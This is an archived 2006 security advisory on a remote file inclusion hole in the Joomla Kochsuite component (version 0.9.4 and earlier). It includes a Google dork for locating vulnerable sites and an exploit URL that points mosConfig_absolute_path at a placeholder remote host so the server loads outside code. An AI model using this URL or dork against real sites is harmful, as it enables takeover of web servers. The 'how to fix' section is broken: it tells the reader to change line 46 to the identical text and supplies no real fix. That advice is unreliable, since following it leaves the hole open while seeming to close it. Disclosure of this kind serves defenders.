TUCoPS :: Web :: CMS / Portals

TUCoPS :: Web :: CMS / Portals :: b06-4342.htm
Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability

Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability


 =0D
    .:[ insecurity research team ]:.=0D
     .__..____.:.______.____.:.____ .=0D
 .:. |  |/    \:/  ___// __ \:/   _\.:.=0D
   : |  |   |  \\____\\  ___/\   /__ :. .=0D
 ..: |__|___|  /____  >\___  >\___  >.:=0D
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:=0D
 .   ...:.    .advisory.    .:...=0D
         :..................: 18.o8.2oo6 ..=0D
 =0D
 =0D
  Affected Application: Kochsuite v0.9.4=0D
=0D
       (Mambo/Joomla CMS Component)=0D
 =0D
 =0D
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  Discoverd by: camino=0D
 =0D
  Team: Insecurity Research Team=0D
 =0D
URL: http://www.insecurityresearch.org=0D 
 =0D
  E-Mail: camino[at]sexmagnet[dot]com=0D
 =0D
 =0D
 =0D
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  Typ: Remote [x]  Local [ ]=0D
 =0D
       Remote File Inclusion [x]  SQL Injection [ ]=0D
 =0D
  Level: Low [ ]  Middle [x]  High [ ]=0D
 =0D
  Application: Kochsuite=0D
 =0D
  Version: 0.9.4=0D
 =0D
  Vulnerable File: config.kochsuite.php=0D
 =0D
URL: http://www.vegisto.com=0D 
 =0D
  Description: It's a component for chiefs to publish theirs stuff...=0D
 =0D
  Dork: inurl:"com_kochsuite"=0D
 =0D
 =0D
 =0D
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
=0D
=0D
http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/=0D 
=0D
config.kochsuite.php?mosConfig_absolute_path=http://huh?=0D 
 =0D
 =0D
 =0D
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  o1.) open config.kochsuite.php=0D
 =0D
  o2.) take a look at line 46:=0D
=0D
         # Don't allow direct linking    defined( '_VALID_MOS' ) or =0D
=0D
         die( 'Direct Access to this location is not allowed.' );=0D
=0D
  o3.) take a look at line 47:=0D
=0D
         require_once ($mosConfig_absolute_path.'/administrator/=0D
=0D
         components/com_kochsuite/includes/letters.inc');=0D
 =0D
  o4.) change line 46:=0D
=0D
         defined( '_VALID_MOS' ) or =0D
=0D
         die( 'Direct Access to this location is not allowed.' );=0D
 =0D
 =0D
 =0D
 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members =0D
=0D
  of insecurity research team ;-)